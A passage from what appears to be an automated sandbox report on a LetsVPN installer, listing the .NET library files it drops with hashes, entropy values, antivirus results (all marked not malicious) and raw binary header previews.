                                                                                                                                                                                                  MD5:C0A30AA26D512873D0B9FEA741870AF1
                                                                                                                                                                                                  SHA1:FD9599E524B3AA48198F0F4D9DF676766ED02F61
                                                                                                                                                                                                  SHA-256:B2AEFFBC045D8B20D4F3F2EC35A16A4F68A1034392DCC22DECAEE814BB600C20
                                                                                                                                                                                                  SHA-512:EBC71E2036F9C84F6214BC4418715C2A7A2B17D00AE7E91FDC5A65BFB26AC21E814362B62D249F0B5BD85FBF4E834204E5FCF5EBD6BFC85F8B6B86D7C6B2BFE6
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...]............" ..0..P...........n... ........... ..............................jk....`.................................Gn..O....................X.. ...........xm..8............................................ ............... ..H............text....N... ...P.................. ..`.rsrc................R..............@..@.reloc...............V..............@..B................{n......H........5...7...................l........................................(....*F.~....(....t:...*6.~.....(....*F.~....(....t:...*6.~.....(....*F.~....(....t:...*6.~.....(....*6.t.....}....*..{....-%..(.....(......(......s....(....}.....{....*..0..........r...p.:...(.........(............s....s....(.........r1..p.:...(.........(............s....s....(.........rO..p.:...(.........(............s....s....(.........*J.s....}.....(....*F.~....(....t....*6.~.....(....*V.t....o....,

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Primitives.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):16928
                                                                                                                                                                                                  Entropy (8bit):6.951071216277355
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:SN9VWhX3W+hqWOHlLf2KQcvBZ9sGQtS+ShjmM6IGBkSXC:SGbq3b2KZBZZOS+ST6nk1
                                                                                                                                                                                                  MD5:45A59E4D60F6970DCA66AB643AA8C8CD
                                                                                                                                                                                                  SHA1:2A25F0B075E9B39E104B2741A389C820ABE74F70
                                                                                                                                                                                                  SHA-256:FD532F01EC78C8E93AAB9C9349A5106966B3065F42E39989FEC7EB5F15B3293C
                                                                                                                                                                                                  SHA-512:72009C298FEC97ED2142B37D5A5FDFCED65DAAF43FBB45754035CCFD62D0D0F0DB465050B747CAF86223691E49544471FD6DCAB6604D96CF47390186E69D32BD
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...?..Y.........." ..0..............(... ...@....... ..............................m.....@.................................T(..O....@..0............... ....`.......'............................................... ............... ..H............text........ ...................... ..`.rsrc...0....@......................@..@.reloc.......`......................@..B.................(......H.......P ..L....................&......................................BSJB............v4.0.30319......l...|...#~......<...#Strings....$.......#US.(.......#GUID...8.......#Blob......................3......................................................\.....0...........D.................C.................[.....x.....-.........................................).....1.....9.....A.....I.....Q.....Y.....a.....i.....q.........................#.....+.....3.....;.....C.7...K.W...S.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.AccessControl.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):22560
                                                                                                                                                                                                  Entropy (8bit):6.7753295378501
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:kSk7xWUHIx0S3WF7rWthqWOHlLf2KQcvBZ9fGS+ShjmM6IGBkSJ6Z:k/0UHU0SOaq3b2KZBZMS+ST6nkZZ
                                                                                                                                                                                                  MD5:2D864C6E9E03F41D091BDDDD392B38DF
                                                                                                                                                                                                  SHA1:FA367DA623EAA3A114DB0EC35599E63E53A068B3
                                                                                                                                                                                                  SHA-256:D7EA78A691416DCB9BC10A615CA41B13A5F2698DE414E2C80867B6F20B832508
                                                                                                                                                                                                  SHA-512:EE2BCD1D40E111DA22F76331CA1BC2FA48E913DBC2A99CF4DFC28883556B86C7EDB903AFDE8524748804572F6EB6043223A1EB99862F6061E94ECF4CC5A373F0
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...9.2..........." ..0..............=... ...@....... ....................................`..................................<..O....@...............*.. ....`.......;..T............................................ ............... ..H............text........ ...................... ..`.rsrc........@....... ..............@..@.reloc.......`.......(..............@..B.................<......H....... "...............8..(... ;........................................(....*^.(...........%...}....*:.(......}....*:.(......}....*:.(......}....*:.(......}....*..{....*"..(....*"..(....*"..(....*"..(....*"..(....*..(....*..(....*..(....*..(....*:.(......}....*..{....*:.(......}....*..{....*:.(......}....*..{....*..(....*:.(......}....*..{....*^.(...........%...}....*:.(......}....*..{....*z.(......}...........%...}....*V.(......}......}....*..{....*..{....*V.-.r...ps....z

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.Registry.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):29216
                                                                                                                                                                                                  Entropy (8bit):6.47574588426455
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:N4QVrxViR9mlxdgq3b2KZBZ6aS+ST6nke:FdxViR9mlxdT3qKsa/mQ
                                                                                                                                                                                                  MD5:C969E3ED73E69BE104174C989080CC51
                                                                                                                                                                                                  SHA1:9CB185BE071F23406E7B961E0996EDC71A61834E
                                                                                                                                                                                                  SHA-256:4AB704100BA1E5248B8E05934AD9597C0F6DA0306E4AE37A8F2F8CFAA48B1921
                                                                                                                                                                                                  SHA-512:8F1DF0B377FC098CD909EE3C28E5AABF441954919AC11AD591E89C5FF2A0EA23637C8537A3528429A9C6DBE376E1A13A68D910AC600486EF6ABAF32D179C4248
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....j............" ..0..:..........jX... ...`....... ....................................`..................................X..O....`...............D.. ...........$W..T............................................ ............... ..H............text...p8... ...:.................. ..`.rsrc........`.......<..............@..@.reloc...............B..............@..B................LX......H........$..8"...........G.......V.......................................~....*..0..1.......(....,..%-.&.*..(.....o.......&...,...o....,..*.*....................(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%....(....*......(

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Microsoft.Win32.SystemEvents.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.675783274544051
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:384:tdIaf4rbDyIb/KcWCNRWr7JW/yhqWOHlLf2KQcvBZ9B/MkS+ShjmM6IGBkS5:t+THDHbs6GWGq3b2KZBZokS+ST6nkS
                                                                                                                                                                                                  MD5:D6E4174C9B4EF259C9CB5F37B509F842
                                                                                                                                                                                                  SHA1:2061F234A0004F4A0F17CB41DF611497943CEC05
                                                                                                                                                                                                  SHA-256:579FC3FE3BF74F2F48A2416DE7EE7BF87BF7FBF8749EEBF4D170D51A5F31BD79
                                                                                                                                                                                                  SHA-512:E97DCB302BC88D81A060C5D18024528DA4B3BA696EA082E2C3FFF4298B23A72C2317F51D3A1A073A0878CA293D3D1D8EF2DC17CAF18C60DCA3C0365658E6B81C
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...8............." ..0..*...........H... ...`....... ...............................)....`.................................yH..O....`..d............4.. ............G..T............................................ ............... ..H............text....(... ...*.................. ..`.rsrc...d....`.......,..............@..@.reloc...............2..............@..B.................H......H........$...............A.......G.......................................~....*..0..........(....,..*..(.....o.......&...*...................0...........(.......(....-..,..*.*.(....,.r...p......%...%...(....*..(....*.(....,.r...p......%...%...%...(....*...(....*.(....,!r...p......%...%...%...%...(....*....(....*..,&(....,..r...pr...p.(....(....*..(....*.*.(....,.r...p......%...%...(....*...(....*.(....,.r...p......%...%...%...(....*....(....*.(....,"r...p......%...%...%...%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Mdb.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54816
                                                                                                                                                                                                  Entropy (8bit):6.292347937187533
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:Mr59g98C87KHeBUbwgKirbdwMRTzAt9l63qKk/mI8:Mr5HC87rUbwgKirJw1Dl6g/B8
                                                                                                                                                                                                  MD5:33CA4672410B18BB3C83114E36A6B5DC
                                                                                                                                                                                                  SHA1:E2BFF454FFA6C97C9BF5B343708FCD844404BF32
                                                                                                                                                                                                  SHA-256:24352BC45172AADBDC732016CBB57705630CE2B87F50EC915F28DFDE8172B739
                                                                                                                                                                                                  SHA-512:C5C52435F90B9598B901DA27B3E3B95C8E7D2256C8F7944CEAFAE49BD34C3169B16DFFCEEE5056F31AC70272EA4458F870D5D601364E9D7B663BEE631D80E054
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....u-..........." ..0................. ........... ..............................K.....@.....................................O.......`............... ...............T............................................ ............... ..H............text....... ...................... ..`.rsrc...`...........................@..@.reloc..............................@..B.......................H........a..x\..................@.........................................(....*:...(....(....*&...(....*"..(....*"..(....*"..(....*..(....*.0..,........o....o......o.....jo.....o.....o.....o....*..s....}.....s....}.....s....}......2}.....(.....s4...}....*b.{.....o ....{....o!...*b.{.....o"....{....o#...*6.{.....o$...*.0..-........{....,.s%...z................s.......(.....*..{....,.s%...z.{....-..s&...}.....{......sS...o'...*..{....,.s%...z.{.....o(.......oU...*..{....,.s%..

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Pdb.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):100896
                                                                                                                                                                                                  Entropy (8bit):6.424195990637689
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:BU2qJ+RazRt/Kc4oJiOxFR4NdJF0/RfhF46HAoYKHgPzpS6w7fa1C9rD3qKi/mt:K2MRtrfrR+Pe/xAiAzpQ7y1C9rDW/W
                                                                                                                                                                                                  MD5:1617B96006C9490C73D574F69FCC5B57
                                                                                                                                                                                                  SHA1:21704ABDD45998D58F106C511C926C697C42320D
                                                                                                                                                                                                  SHA-256:828BA79ADE3358961DD11B11175A9F913E163D711B5C12749D109830FBAF366E
                                                                                                                                                                                                  SHA-512:EE6FF1F39C6E3DFB6F9AD7E9495D5A4C6A46E15D961FB8DFEFC09EAB0FFA6276287B3ABB27D2E08F2271605F365BF99EF00550345F0CFA8E516435E3E8F5CEA2
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....rd..........." ..0..T...........q... ........... ....................................@.................................eq..O.......`............\.. ............p..T............................................ ............... ..H............text....S... ...T.................. ..`.rsrc...`............V..............@..@.reloc...............Z..............@..B.................q......H.......<s.......................p......................................:.(......}....*..{....-...{....(.....{......o....*..{....-...{....(.....{......o....*....0..a........s....}.....s....}.....o....o.....+(.o......{.....o.......(.....o......(.....o....-....,..o.....*.........".4V.......0..J........o....o ....+"..(!.....{.....o.......(.....o".....(#...-...........o.....*........../;.......s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$...z.s$.

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.Rocks.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):39456
                                                                                                                                                                                                  Entropy (8bit):6.494502675405848
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:A+meiCyrXOwS8uRssveum1peFLHFBbOBq3b2KZBZ25S+ST6nkj:ryrewFassveuPbBC03qKc/m5
                                                                                                                                                                                                  MD5:EC80554D9363197EBFCE80B8AD93E8BB
                                                                                                                                                                                                  SHA1:661EFC6DBD4F950076F23B41789C38F106953DEA
                                                                                                                                                                                                  SHA-256:CF84E892C469AC8931B7C0DBA290DD35D52340BBEEE669BCC91E9AF638D1AD85
                                                                                                                                                                                                  SHA-512:C2C76C4C5B2474546DDF4F8505E3094E6C2E116FE77A1E1B49BEC7E43643773A75B8262CF8579801F2656C8ADACBD27C33B76B7ABE89ED4614AB0B0143630FFA
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....i............" ..0..d............... ........... ....................................@....................................O.......l............l.. ...............T............................................ ............... ..H............text...4c... ...d.................. ..`.rsrc...l............f..............@..@.reloc...............j..............@..B........................H.......,A..\@..........................................................J.(.....s....}....**..F.(....**..E.(....*z.{.....To.....:o....&...(....*.0..a.........M.(.....o....,,.{.....`o.....`o....&.{.....o....o....o....&.o....,...o....(.....(....,...(....*..-.r...ps ...z.o!...,%.o"...r...p(#...-..o"...r#..p(#...*.*.*n.{.....~o....&..o$...(....*z..P.(.....o%...,...o&...(....*..{.....(o....&.........s'...(...+.{.....)o....&*..0..3........o(.......YE........3...........m...&...`...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Mono.Cecil.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):356896
                                                                                                                                                                                                  Entropy (8bit):6.249285614378823
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:VFzzF5VOCxfiKKhsw4NiL0XRzx9WoCklyusCLU:vdfiKI4RzWSyu8
                                                                                                                                                                                                  MD5:C993931B4C49CBB08BE01F5948222C21
                                                                                                                                                                                                  SHA1:AFAFFE49A7709FB0DF1BEB36791A8800153593DB
                                                                                                                                                                                                  SHA-256:0FD8A36F7404D57DC3A3497E42E9ADE20268CDABAE2C481B134FF51555791A0A
                                                                                                                                                                                                  SHA-512:B367F098169A84F29643216E8182277884DB829C1F404BBA4BBC10290BA9FB88B1CC99D0AEC3DEBCF626445E20B8A04C3BF6EC520AB8866C4F417EA3E6F2C489
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...i.}..........." ..0..<...........Q... ...`....... ..............................~Y....@..................................Q..O....`..H............D.. ............P..T............................................ ............... ..H............text....:... ...<.................. ..`.rsrc...H....`.......>..............@..@.reloc...............B..............@..B.................Q......H........b..@...................DP......................................"..s0...*"..s0...*>..}1.....}2...*..{1....O...,..{2...,..{1....O...o&...*2..O....3...*6.r...p.(4...*..(5.....}6......i.O...}7....{6....{7.....i(8.....}9...*2....i.(:...*>..s;.....(<...*V..{7....{6.....(=...*..0..1..........Y./.*...X.[......(=.........(=..........(>...*....0.._..............+P.../5.../..{9......O......O...o?....0.....%.X..O....O...+.....%.X..O....O.....X....2.*z...X...b...X...b`...X..b`...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\Newtonsoft.Json.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):711712
                                                                                                                                                                                                  Entropy (8bit):5.966409790111297
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:12288:ZBja5bBvR8Q0TE2HB0WLmvXbsVG1Gw03RzxNHgKhwFBkjSHXP36RMGy1NqTUO:ZBjk38WuBcAbwoA/BkjSHXP36RMGf
                                                                                                                                                                                                  MD5:3B3F8E087FC13A4B7BC9CF7DBBA4ED9B
                                                                                                                                                                                                  SHA1:321E0D0C5C275F2F57AF78BC465535A923D2427C
                                                                                                                                                                                                  SHA-256:AE71F96B5316A5B8EFF90F2DA4C9B55C57FB6A74193F380DEB38E49FE1010DDE
                                                                                                                                                                                                  SHA-512:F823D1460EB52FD039C248E6353587ADB2B78CA9EF988AA9EC7402C428FC3F178D099D5ECD106FDD9E2E051D87DB4A799CD3DE51C402E5C79E5014E6C8C6A6B5
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...p$?..........." ..0.............B.... ........... ....................... ............`....................................O....................... ........... ...T............................................ ............... ..H............text........ ...................... ..`.rsrc...............................@..@.reloc..............................@..B................$.......H.......x...(9............................................................(....*..(....*^.(...........%...}....*:.(......}....*:.(......}....*..(....*:.(......}....*..{....*..(....*..(....*:.(......}....*..{....*.(.........*....}.....(......{.....X.....}....*..0...........-.~....*.~....X....b...aX...X...X..+....b....aX....X.....2.....cY.....cY....cY..|....(......._..{........+,..{|....3...{{......(....,...{{...*..{}.......-..*...0...........-.r...ps....z.o......-.~....*.~....

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\NuGet.Squirrel.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):521760
                                                                                                                                                                                                  Entropy (8bit):6.048533534397053
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:6144:rRKflaWVRA6+LX9c1t3HpbOmhYIeDUQjcaPlq1fQx7NqEaElDp3sL2blV/VyUd93:rRt6+A1pbOsBQAa4f0pWSbb+1ikY
                                                                                                                                                                                                  MD5:F5058D921BF63CBA6CCC215365907B8B
                                                                                                                                                                                                  SHA1:F2085212F559708D955EA7A11D59C974FFA70797
                                                                                                                                                                                                  SHA-256:FF54E93669169BB320F3C9F086EC1E39C9EB26D582D63C1EEF77E5CC8A2801B5
                                                                                                                                                                                                  SHA-512:D85672DD7AD98999B3970190C8DCAF879E2DB1B19762B40712DD125931107F2D2A81911C96F2A01F999BBEE9F68F5EF2C5B7827F4B8B0E365C6B2FD5728B3ADC
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....p_.........." ..0.................. ........... ....................... ............`.....................................O....................... ............................................................ ............... ..H............text...$.... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................H.......Xw...............r...i............................................{E...*..{F...*V.(G.....}E.....}F...*...0..;........u1.....,/(H....{E....{E...oI...,.(J....{F....{F...oK...*.*. .... )UU.Z(H....{E...oL...X )UU.Z(J....{F...oM...X*.0..b........r...p......%..{E......%q4....4...-.&.+...4...oN....%..{F......%q5....5...-.&.+...5...oN....(O...*..{P...*..{Q...*V.(G.....}P.....}Q...*.0..;........u6.....,/(H....{P....{P...oI...,.(J....{Q....{Q...oK...*.*. .2;. )UU.Z(H....{P...oL

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\PusherClient.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):54304
                                                                                                                                                                                                  Entropy (8bit):6.3200343699892345
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:768:e2xghQUndJrmbnJAM6LjB4Mz5k+/FdS0/MuLs/09P2vq3b2KZBZV5SS+ST6nkKe:eGghQaJiFAMAhH/Dw/09Oi3qKVS/mQe
                                                                                                                                                                                                  MD5:FFECD2746B52EC4505805F28242F2369
                                                                                                                                                                                                  SHA1:1DBBA0503D5DC2E24EE7508850911AD1B973AF2B
                                                                                                                                                                                                  SHA-256:054AE39C180EA555CA0834E5C29CFC3F4F3BA034B4EC7E92554BE2109EE29E1B
                                                                                                                                                                                                  SHA-512:C56AD991F652F37C0257B5BE39B88B112ED26BC4EBBC2D3B1E431478A5366A98CB9EA6E641B8D84449DDADB1644538CBCE8FFE789E8AB8E32EF3350BC26C1B17
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................" ..0................. ........... ..............................j.....`.....................................O.......D............... ...............T............................................ ............... ..H............text........ ...................... ..`.rsrc...D...........................@..@.reloc..............................@..B.......................H........M...o............................................................{....*..{....*..{....*r.(......}......}......}....*....0..S........u......,G(.....{.....{....o....,/(.....{.....{....o....,.(.....{.....{....o....*.*..0..K....... ..,. )UU.Z(.....{....o....X )UU.Z(.....{....o....X )UU.Z(.....{....o....X*..0..{........r...p......%..{.............-.&.+.......o ....%..{.............-.&.+.......o ....%..{.............-.&.+.......o ....(!...*..{"...*:.(......}"...*...0..#...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLite-net.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):104992
                                                                                                                                                                                                  Entropy (8bit):6.223980748676277
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:ddAKzGN0ifSJxFlm+FpoHloqUIdmJlllf07gllfUzb1kUyN1e/rWhsCMbdynBH3v:dbcl5mJlllf07gllfUzb6W/+b+OHb/b
                                                                                                                                                                                                  MD5:0EA18CFEE679D16BBF6D44C5A7F2ED8F
                                                                                                                                                                                                  SHA1:2C657D4709892B98D5796E644B2F13B568154C7B
                                                                                                                                                                                                  SHA-256:EB5B85284F7C26A7DE75F896CB95A3730253B0D64C1C4A415B10060F2C60CEAE
                                                                                                                                                                                                  SHA-512:A053B405BEE5754E3F0111AAF5CB6866F4D4467B52259D775E61DDC4EEF8A884CD54F3E207BFCC4DA4F548CE25FBFF161080F08604958ECEC3D8CA413E12869B
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...#............" ..0..b..........&.... ........... ..............................P.....`.....................................O....................l.. ............................................................ ............... ..H............text...,`... ...b.................. ..`.rsrc................d..............@..@.reloc...............j..............@..B........................H.......@...x.............................................................{....*"..}....*>..(......(....*"..s....*..{....*"..}....*......(....*..0..?.......s........}|......(.....,%.{|...,...o...........s....(...+(....*"..s....**....s....*R.o.....o......s....*..{....*"..}....*..{!...*"..}!...*..{"...*"..}"...*..{#...*"..}#...*..{$...*"..}$...*..{%...*"..}%...*..{&...*"..}&...*..{'...*"..}'...*..{(...*"..}(...*..{)...*"..})...*rs................. ...(....*..0..................

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensions.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):49184
                                                                                                                                                                                                  Entropy (8bit):6.266059158176653
                                                                                                                                                                                                  Encrypted:false
                                                                                                                                                                                                  SSDEEP:1536:NqRdL3e5rHMgWVTnyac4oeZrZ3W3qKZy/mb:kdLTtrZ3Wly/8
                                                                                                                                                                                                  MD5:74F34DD4A8A4B1F44B805FDF77CE0C68
                                                                                                                                                                                                  SHA1:E4241F0226EDB1EE78EBCD96049187BFC78E2EFA
                                                                                                                                                                                                  SHA-256:80CE7E9D4F09F73DEC13A550DC31E0EFFA79DD5BA07479954D6CDEBD3B6FD6AA
                                                                                                                                                                                                  SHA-512:A5A0B04A95409A9A04B2DE72F80EC410D5AC26AC46832E5DBE1F8C7A04EC7AD56915A387F3D33E4A3CA014327A1FDEDEAE1958AAF8AE8020CCB3830F68516341
                                                                                                                                                                                                  Malicious:false
                                                                                                                                                                                                  Antivirus:
                                                                                                                                                                                                  • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                  Reputation:unknown
                                                                                                                                                                                                  Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...:. Z.........." ..0.................. ........... ....................................@.....................................O.......L............... ...........|................................................ ............... ..H............text........ ...................... ..`.rsrc...L...........................@..@.reloc..............................@..B.......................H........K...Y............................................................{....*..{....*V.(......}......}....*...0..;........u......,/(.....{.....{....o....,.(.....{.....{....o....*.*. ...E )UU.Z(.....{....o....X )UU.Z(.....{....o....X*.0...........r...p......%..{.....................-.q.............-.&.+.......o.....%..{.....................-.q.............-.&.+.......o.....(....*..{....*"..}....*..{....*"..}....*..ra..p......%...%...%...(....( ...*...0..M........o...+..,...

                                                                                                                                                                                                  C:\Program Files (x86)\letsvpn\app-3.12.0\SQLiteNetExtensionsAsync.dll

                                                                                                                                                                                                  Download File
                                                                                                                                                                                                  Process:C:\ProgramData\letsvpn-latest.exe
                                                                                                                                                                                                  File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                                                                                                                  Category:dropped
                                                                                                                                                                                                  Size (bytes):25120
                                                                                                                                                                                                  Entropy (8bit):6.623339844778744
                                                                                                                                                                                                  Encrypted:false
